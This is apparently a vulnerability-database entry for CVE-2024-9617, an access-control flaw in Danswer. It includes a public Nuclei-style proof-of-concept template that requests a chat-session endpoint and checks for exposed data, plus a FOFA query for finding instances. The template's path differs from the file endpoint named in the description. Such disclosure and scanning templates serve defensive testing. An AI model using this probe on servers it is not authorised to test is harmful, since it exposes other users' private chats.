漏洞描述
The application does not verify whether the attacker is the creator of the file, allowing the attacker to directly call the GET /api/chat/file/{file_id} interface to view any user's file.
CVE-2024-9617: Danswer - Insecure Direct Object Reference
PoC代码[已公开]
id: CVE-2024-9617
info:
name: Danswer - Insecure Direct Object Reference
author: s4e-io
severity: medium
description: |
The application does not verify whether the attacker is the creator of the file, allowing the attacker to directly call the GET /api/chat/file/{file_id} interface to view any user's file.
reference:
- https://huntr.com/bounties/8f683ff6-3a99-41c6-b763-a8f7b73bd146
- https://github.com/danswer-ai/danswer
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2024-9617
cwe-id: CWE-284
epss-score: 0.19269
epss-percentile: 0.95143
metadata:
verified: true
max-request: 1
vendor: danswer-ai
product: danswer
fofa-query: icon_hash="484766002"
tags: cve,cve2024,danswer,idor,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/chat/get-chat-session/1?is_shared=True"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "chat_session_id", "description", "persona_id")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402201a5c761d66d09757f8f5d42c2f101a38fd4331ca7b761e16f6d6e5ab17305e6002201a3023e0acdb25728413a155c840a1f576b6eb2251e6378ffd38b807d21dd281:922c64590222798bb761d5b6d8e72950